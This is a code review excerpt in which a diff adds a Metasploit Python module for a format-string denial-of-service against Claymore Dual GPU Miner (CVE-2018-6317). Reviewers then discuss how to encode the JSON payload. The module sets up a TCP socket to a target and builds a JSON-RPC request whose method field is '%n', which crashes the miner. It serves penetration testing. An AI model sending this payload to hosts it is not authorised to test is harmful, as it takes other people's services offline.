modules/auxiliary/dos/tcp/claymore_dos.py

```diff
@@ -0,0 +1,55 @@
+#!/usr/bin/env python
+# Note, works with both python 2.7 and 3
+
+
+import socket
+import json
+
+from metasploit import module
+
+metadata = {
+    'name': 'Claymore Dual GPU Miner  Format String dos attack',
+
+    'description': '''
+    Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an 
+    unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing 
+    a denial of service.
+    ''',
+
+    'authors': [
+        'res1n',  # Vulnerability disclosure
+        'bluebird',  # Metasploit external module (Python)
+    ],
+
+    'date': '2018-02-06',
+
+    'references': [
+        {'type': 'cve', 'ref': 'CVE-2018-6317'},
+        {'type': 'url', 'ref': 'https://www.exploit-db.com/exploits/43972/'},
+        {'type': 'url', 'ref': 'https://github.com/nanopool/Claymore-Dual-Miner'}
+    ],
+
+    'type': 'dos',
+    'options': {
+        'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},
+        'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 3333},
+    }}
+
+
+def run(args):
+    host = args['rhost']
+    port = int(args['rport'])
+    module.log("Creating sockets...", 'info')
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    exp = '''{"id": 1,"jsonrpc": "1.0","method": "%n"}'''
```

Comment:
I think using `json.dumps({'id': 1, 'jsonrpc': '1.0', 'method': '%n'}).encode()` would be the more reliable way to write this.

Reply:
It is good.But when It does not seem to work in python2. it is `str` type

Reply:
I don't have a problem on my 2.7.10 install. What version of python 2 are you running and what traceback do you get?